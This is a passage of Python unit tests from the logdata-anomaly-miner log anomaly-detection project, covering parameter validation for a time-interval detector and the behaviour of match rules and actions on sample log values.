PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=b"Default") self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=True) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=123) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=123.3) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list={"id": "Default"}) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=()) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=set()) PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=[]) PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=None) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=None) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=b"True") self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline="True") self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=123) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=123.22) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline={"id": "Default"}) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=["Default"]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=[]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=()) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=set()) PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=True) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=b"True") self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode="True") self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=123) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=123.22) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode={"id": "Default"}) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=["Default"]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=[]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=()) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=set()) PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True) self.assertRaises(ValueError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_period_length=-1) self.assertRaises(ValueError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_period_length=0) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_period_length=100.22) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_period_length=b"Default") self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_period_length="123") self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_period_length={"id": "Default"}) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_period_length=["Default"]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_period_length=[]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_period_length=()) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_period_length=set()) PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_period_length=100) self.assertRaises(ValueError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], max_time_diff=-1) self.assertRaises(ValueError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], max_time_diff=0) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], max_time_diff=100.22) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], max_time_diff=b"Default") self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], max_time_diff="123") self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], max_time_diff={"id": "Default"}) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], max_time_diff=["Default"]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], max_time_diff=[]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], max_time_diff=()) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], max_time_diff=set()) PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], max_time_diff=100) self.assertRaises(ValueError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_reduce_time_list=-1) self.assertRaises(ValueError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_reduce_time_list=0) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_reduce_time_list=100.22) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_reduce_time_list=b"Default") self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_reduce_time_list="123") self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_reduce_time_list={"id": "Default"}) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_reduce_time_list=["Default"]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_reduce_time_list=[]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_reduce_time_list=()) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_reduce_time_list=set()) PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_reduce_time_list=100) self.assertRaises(ValueError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=set()) PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=100) PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=set()) PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=100) PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list="") self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=True) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=123) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=123.22) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=()) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=set()) PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/RulesTest.py000066400000000000000000001757121500476301700261240ustar00rootroot00000000000000import unittest import math from aminer.analysis.Rules import EventGenerationMatchAction, AtomFilterMatchAction, PathExistsMatchRule, ValueMatchRule, ValueListMatchRule, \ ValueRangeMatchRule, StringRegexMatchRule, ModuloTimeMatchRule, ValueDependentModuloTimeMatchRule, IPv4InRFC1918MatchRule, \ AndMatchRule, OrMatchRule, ParallelMatchRule, ValueDependentDelegatedMatchRule, NegationMatchRule from aminer.parsing.ParserMatch import ParserMatch from aminer.input.LogAtom import LogAtom from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector import re from aminer.parsing.MatchElement import MatchElement from time import time from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummyNumberModelElement from datetime import datetime, timezone class RuleTest(TestBase): """NOTE: DebugMatchRule and DebugHistoryMatchRule are intentionally not tested, as there is not much to be tested.""" def test1EventGenerationMatchAction(self): """This test case checks if events are generated and pushed to all event handlers.""" expected_string = '%s This message was generated, when the unittest was successful.\n%s: "None" (%d lines)\n %s\n\n' message = "This message was generated, when the unittest was successful." t = time() match_context = DummyMatchContext(b"25000") fdme = DummyFixedDataModelElement("s1", b"250") match_element = fdme.get_match_element("fixed", match_context) egma = EventGenerationMatchAction("Test.%s" % self.__class__.__name__, message, [self.stream_printer_event_handler]) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), t, egma) egma.match_action(log_atom) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S"), egma.__class__.__name__, 1, log_atom.parser_match.match_element.annotate_match(""))) self.assertRaises(ValueError, EventGenerationMatchAction, "", message, [self.stream_printer_event_handler]) self.assertRaises(TypeError, EventGenerationMatchAction, b"Test", message, [self.stream_printer_event_handler]) self.assertRaises(TypeError, EventGenerationMatchAction, 123, message, [self.stream_printer_event_handler]) self.assertRaises(TypeError, EventGenerationMatchAction, 123.2, message, [self.stream_printer_event_handler]) self.assertRaises(TypeError, EventGenerationMatchAction, True, message, [self.stream_printer_event_handler]) self.assertRaises(TypeError, EventGenerationMatchAction, None, message, [self.stream_printer_event_handler]) self.assertRaises(TypeError, EventGenerationMatchAction, {"id": "Default"}, message, [self.stream_printer_event_handler]) self.assertRaises(TypeError, EventGenerationMatchAction, ["Test.%s" % self.__class__.__name__], message, [self.stream_printer_event_handler]) self.assertRaises(TypeError, EventGenerationMatchAction, (), message, [self.stream_printer_event_handler]) self.assertRaises(TypeError, EventGenerationMatchAction, set(), message, [self.stream_printer_event_handler]) self.assertRaises(TypeError, EventGenerationMatchAction, "Test", message.encode(), [self.stream_printer_event_handler]) self.assertRaises(TypeError, EventGenerationMatchAction, "Test", 123, [self.stream_printer_event_handler]) self.assertRaises(TypeError, EventGenerationMatchAction, "Test", 123.2, [self.stream_printer_event_handler]) self.assertRaises(TypeError, EventGenerationMatchAction, "Test", True, [self.stream_printer_event_handler]) self.assertRaises(TypeError, EventGenerationMatchAction, "Test", None, [self.stream_printer_event_handler]) self.assertRaises(TypeError, EventGenerationMatchAction, "Test", {"id": "Default"}, [self.stream_printer_event_handler]) self.assertRaises(TypeError, EventGenerationMatchAction, "Test", [message], [self.stream_printer_event_handler]) self.assertRaises(TypeError, EventGenerationMatchAction, "Test", (), [self.stream_printer_event_handler]) self.assertRaises(TypeError, EventGenerationMatchAction, "Test", set(), [self.stream_printer_event_handler]) EventGenerationMatchAction("Test", "", [self.stream_printer_event_handler]) self.assertRaises(ValueError, EventGenerationMatchAction, "Test", message, []) self.assertRaises(TypeError, EventGenerationMatchAction, "Test", message, ["default"]) self.assertRaises(TypeError, EventGenerationMatchAction, "Test", message, None) self.assertRaises(TypeError, EventGenerationMatchAction, "Test", message, "") self.assertRaises(TypeError, EventGenerationMatchAction, "Test", message, b"Default") self.assertRaises(TypeError, EventGenerationMatchAction, "Test", message, True) self.assertRaises(TypeError, EventGenerationMatchAction, "Test", message, 123) self.assertRaises(TypeError, EventGenerationMatchAction, "Test", message, 123.3) self.assertRaises(TypeError, EventGenerationMatchAction, "Test", message, {"id": "Default"}) self.assertRaises(TypeError, EventGenerationMatchAction, "Test", message, set()) self.assertRaises(TypeError, EventGenerationMatchAction, "Test", message, ()) def test2AtomFilterMatchAction(self): """This test case proves the functionality of the AtomFilterMatchAction.""" t = time() match_context = DummyMatchContext(b"25000") fdme = DummyFixedDataModelElement("s1", b"25000") match_element = fdme.get_match_element("fixed", match_context) nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False) afma = AtomFilterMatchAction([nmpd], True) log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, afma) self.assertTrue(afma.match_action(log_atom)) self.assertRaises(TypeError, AtomFilterMatchAction, "", True) self.assertRaises(TypeError, AtomFilterMatchAction, ["default"], True) self.assertRaises(TypeError, AtomFilterMatchAction, True, True) self.assertRaises(TypeError, AtomFilterMatchAction, b"Default", True) self.assertRaises(TypeError, AtomFilterMatchAction, 123, True) self.assertRaises(TypeError, AtomFilterMatchAction, 123.3, True) self.assertRaises(TypeError, AtomFilterMatchAction, {"id": "Default"}, True) self.assertRaises(TypeError, AtomFilterMatchAction, set(), True) self.assertRaises(TypeError, AtomFilterMatchAction, (), True) AtomFilterMatchAction([], True) AtomFilterMatchAction(None, True) self.assertRaises(TypeError, AtomFilterMatchAction, [nmpd], b"True") self.assertRaises(TypeError, AtomFilterMatchAction, [nmpd], "True") self.assertRaises(TypeError, AtomFilterMatchAction, [nmpd], 123) self.assertRaises(TypeError, AtomFilterMatchAction, [nmpd], 123.22) self.assertRaises(TypeError, AtomFilterMatchAction, [nmpd], {"id": "Default"}) self.assertRaises(TypeError, AtomFilterMatchAction, [nmpd], ["Default"]) self.assertRaises(TypeError, AtomFilterMatchAction, [nmpd], []) self.assertRaises(TypeError, AtomFilterMatchAction, [nmpd], ()) self.assertRaises(TypeError, AtomFilterMatchAction, [nmpd], set()) def test3AndMatchRule(self): """Test the AndMatchRule.""" t = time() match_ipv4 = "match/IPv4" pemr_ipv4 = PathExistsMatchRule(match_ipv4, None) pemr_ipv6 = PathExistsMatchRule("match/IPv6", None) ipv4mr = IPv4InRFC1918MatchRule(match_ipv4) amr = AndMatchRule([pemr_ipv4, ipv4mr]) fdme_v4 = DummyFixedDataModelElement("IPv4", b"192.168.0.0") fdme_v6 = DummyFixedDataModelElement("IPv6", b"2001:4860:4860::8888") match_context = DummyMatchContext(b"192.168.0.0") match_element = fdme_v4.get_match_element("match", match_context) match_element.match_object = 3232235520 log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, amr) self.assertTrue(amr.match(log_atom)) amr = AndMatchRule([pemr_ipv6, ipv4mr]) match_context = DummyMatchContext(b"192.168.0.0") match_element = fdme_v4.get_match_element("match", match_context) match_element.match_object = 3232235520 log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, amr) self.assertFalse(amr.match(log_atom)) amr = AndMatchRule([pemr_ipv6, ipv4mr]) match_context = DummyMatchContext(b"2001:4860:4860::8888") match_element = fdme_v6.get_match_element("match", match_context) match_element.match_object = 301989888 log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, amr) self.assertFalse(amr.match(log_atom)) amr = AndMatchRule([pemr_ipv4, ipv4mr]) match_context = DummyMatchContext(b"2001:4860:4860::8888") match_element = fdme_v6.get_match_element("match", match_context) match_element.match_object = 301989888 log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, amr) self.assertFalse(amr.match(log_atom)) self.assertRaises(ValueError, AndMatchRule, [pemr_ipv6]) self.assertRaises(ValueError, AndMatchRule, []) self.assertRaises(TypeError, AndMatchRule, ["default"]) self.assertRaises(TypeError, AndMatchRule, "default") self.assertRaises(TypeError, AndMatchRule, b"default") self.assertRaises(TypeError, AndMatchRule, True) self.assertRaises(TypeError, AndMatchRule, 123) self.assertRaises(TypeError, AndMatchRule, 123.22) self.assertRaises(TypeError, AndMatchRule, {"id": "Default"}) self.assertRaises(TypeError, AndMatchRule, ()) self.assertRaises(TypeError, AndMatchRule, set()) self.assertRaises(TypeError, AndMatchRule, None) self.assertRaises(TypeError, AndMatchRule, [pemr_ipv6, ipv4mr], b"True") self.assertRaises(TypeError, AndMatchRule, [pemr_ipv6, ipv4mr], "True") self.assertRaises(TypeError, AndMatchRule, [pemr_ipv6, ipv4mr], 123) self.assertRaises(TypeError, AndMatchRule, [pemr_ipv6, ipv4mr], 123.22) self.assertRaises(TypeError, AndMatchRule, [pemr_ipv6, ipv4mr], {"id": "Default"}) self.assertRaises(TypeError, AndMatchRule, [pemr_ipv6, ipv4mr], ["Default"]) self.assertRaises(TypeError, AndMatchRule, [pemr_ipv6, ipv4mr], []) self.assertRaises(TypeError, AndMatchRule, [pemr_ipv6, ipv4mr], ()) self.assertRaises(TypeError, AndMatchRule, [pemr_ipv6, ipv4mr], set()) egma = EventGenerationMatchAction("Test.%s" % self.__class__.__name__, "", [self.stream_printer_event_handler]) AndMatchRule([pemr_ipv6, ipv4mr], egma) def test4OrMatchRule(self): """Test the OrMatchRule.""" t = time() match_ipv4 = "match/IPv4" pemr_ipv4 = PathExistsMatchRule(match_ipv4, None) pemr_ipv6 = PathExistsMatchRule("match/IPv6", None) ipv4mr = IPv4InRFC1918MatchRule(match_ipv4) omr = OrMatchRule([pemr_ipv4, ipv4mr]) fdme_v4 = DummyFixedDataModelElement("IPv4", b"192.168.0.0") fdme_v6 = DummyFixedDataModelElement("IPv6", b"2001:4860:4860::8888") match_context = DummyMatchContext(b"192.168.0.0") match_element = fdme_v4.get_match_element("match", match_context) match_element.match_object = 3232235520 log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, omr) self.assertTrue(omr.match(log_atom)) omr = OrMatchRule([pemr_ipv6, ipv4mr]) match_context = DummyMatchContext(b"192.168.0.0") match_element = fdme_v4.get_match_element("match", match_context) match_element.match_object = 3232235520 log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, omr) self.assertTrue(omr.match(log_atom)) omr = OrMatchRule([pemr_ipv6, ipv4mr]) match_context = DummyMatchContext(b"2001:4860:4860::8888") match_element = fdme_v6.get_match_element("match", match_context) match_element.match_object = 301989888 log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, omr) self.assertTrue(omr.match(log_atom)) omr = OrMatchRule([pemr_ipv4, ipv4mr]) match_context = DummyMatchContext(b"2001:4860:4860::8888") match_element = fdme_v6.get_match_element("match", match_context) match_element.match_object = 301989888 log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, omr) self.assertFalse(omr.match(log_atom)) self.assertRaises(ValueError, OrMatchRule, [pemr_ipv6]) self.assertRaises(ValueError, OrMatchRule, []) self.assertRaises(TypeError, OrMatchRule, ["default"]) self.assertRaises(TypeError, OrMatchRule, "default") self.assertRaises(TypeError, OrMatchRule, b"default") self.assertRaises(TypeError, OrMatchRule, True) self.assertRaises(TypeError, OrMatchRule, 123) self.assertRaises(TypeError, OrMatchRule, 123.22) self.assertRaises(TypeError, OrMatchRule, {"id": "Default"}) self.assertRaises(TypeError, OrMatchRule, ()) self.assertRaises(TypeError, OrMatchRule, set()) self.assertRaises(TypeError, OrMatchRule, None) self.assertRaises(TypeError, OrMatchRule, [pemr_ipv6, ipv4mr], b"True") self.assertRaises(TypeError, OrMatchRule, [pemr_ipv6, ipv4mr], "True") self.assertRaises(TypeError, OrMatchRule, [pemr_ipv6, ipv4mr], 123) self.assertRaises(TypeError, OrMatchRule, [pemr_ipv6, ipv4mr], 123.22) self.assertRaises(TypeError, OrMatchRule, [pemr_ipv6, ipv4mr], {"id": "Default"}) self.assertRaises(TypeError, OrMatchRule, [pemr_ipv6, ipv4mr], ["Default"]) self.assertRaises(TypeError, OrMatchRule, [pemr_ipv6, ipv4mr], []) self.assertRaises(TypeError, OrMatchRule, [pemr_ipv6, ipv4mr], ()) self.assertRaises(TypeError, OrMatchRule, [pemr_ipv6, ipv4mr], set()) egma = EventGenerationMatchAction("Test.%s" % self.__class__.__name__, "", [self.stream_printer_event_handler]) OrMatchRule ([pemr_ipv6, ipv4mr], egma) def test5ParallelMatchRule(self): """Test the ParallelMatchRule.""" t = time() match_ipv4 = "match/IPv4" pemr_ipv4 = PathExistsMatchRule(match_ipv4, None) pemr_ipv6 = PathExistsMatchRule("match/IPv6", None) ipv4mr = IPv4InRFC1918MatchRule(match_ipv4) omr = ParallelMatchRule([pemr_ipv4, ipv4mr]) fdme_v4 = DummyFixedDataModelElement("IPv4", b"192.168.0.0") fdme_v6 = DummyFixedDataModelElement("IPv6", b"2001:4860:4860::8888") match_context = DummyMatchContext(b"192.168.0.0") match_element = fdme_v4.get_match_element("match", match_context) match_element.match_object = 3232235520 log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, omr) self.assertTrue(omr.match(log_atom)) omr = ParallelMatchRule([pemr_ipv6, ipv4mr]) match_context = DummyMatchContext(b"192.168.0.0") match_element = fdme_v4.get_match_element("match", match_context) match_element.match_object = 3232235520 log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, omr) self.assertTrue(omr.match(log_atom)) omr = ParallelMatchRule([pemr_ipv6, ipv4mr]) match_context = DummyMatchContext(b"2001:4860:4860::8888") match_element = fdme_v6.get_match_element("match", match_context) match_element.match_object = 301989888 log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, omr) self.assertTrue(omr.match(log_atom)) omr = ParallelMatchRule([pemr_ipv4, ipv4mr]) match_context = DummyMatchContext(b"2001:4860:4860::8888") match_element = fdme_v6.get_match_element("match", match_context) match_element.match_object = 301989888 log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, omr) self.assertFalse(omr.match(log_atom)) self.assertRaises(ValueError, ParallelMatchRule, [pemr_ipv6]) self.assertRaises(ValueError, ParallelMatchRule, []) self.assertRaises(TypeError, ParallelMatchRule, ["default"]) self.assertRaises(TypeError, ParallelMatchRule, "default") self.assertRaises(TypeError, ParallelMatchRule, b"default") self.assertRaises(TypeError, ParallelMatchRule, True) self.assertRaises(TypeError, ParallelMatchRule, 123) self.assertRaises(TypeError, ParallelMatchRule, 123.22) self.assertRaises(TypeError, ParallelMatchRule, {"id": "Default"}) self.assertRaises(TypeError, ParallelMatchRule, ()) self.assertRaises(TypeError, ParallelMatchRule, set()) self.assertRaises(TypeError, ParallelMatchRule, None) self.assertRaises(TypeError, ParallelMatchRule, [pemr_ipv6, ipv4mr], b"True") self.assertRaises(TypeError, ParallelMatchRule, [pemr_ipv6, ipv4mr], "True") self.assertRaises(TypeError, ParallelMatchRule, [pemr_ipv6, ipv4mr], 123) self.assertRaises(TypeError, ParallelMatchRule, [pemr_ipv6, ipv4mr], 123.22) self.assertRaises(TypeError, ParallelMatchRule, [pemr_ipv6, ipv4mr], {"id": "Default"}) self.assertRaises(TypeError, ParallelMatchRule, [pemr_ipv6, ipv4mr], ["Default"]) self.assertRaises(TypeError, ParallelMatchRule, [pemr_ipv6, ipv4mr], []) self.assertRaises(TypeError, ParallelMatchRule, [pemr_ipv6, ipv4mr], ()) self.assertRaises(TypeError, ParallelMatchRule, [pemr_ipv6, ipv4mr], set()) egma = EventGenerationMatchAction("Test.%s" % self.__class__.__name__, "", [self.stream_printer_event_handler]) ParallelMatchRule([pemr_ipv6, ipv4mr], egma) def test6ValueDependentDelegatedMatchRule(self): """Test the ValueDependentDelegatedMatchRule.""" match_any = "match/any" match_ipv4 = "match/IPv4" alphabet = b"There are 26 letters in the english alphabet" srmr = StringRegexMatchRule(match_any, re.compile(rb"\w"), None) fdme1 = DummyFixedDataModelElement("any", alphabet) fdme2 = DummyFixedDataModelElement("any", b".There are 26 letters in the english alphabet") ipv4mr = IPv4InRFC1918MatchRule(match_ipv4) fdme3 = DummyFixedDataModelElement("IPv4", b"192.168.0.0") fdme4 = DummyFixedDataModelElement("IPv4", b"192.168.0.1") vddmr = ValueDependentDelegatedMatchRule([match_any, match_ipv4], {(alphabet,): srmr, (3232235520,): ipv4mr}) match_context = DummyMatchContext(alphabet) match_element = fdme1.get_match_element("match", match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), 1, vddmr) self.assertTrue(vddmr.match(log_atom)) match_context = DummyMatchContext(b"192.168.0.0") match_element = 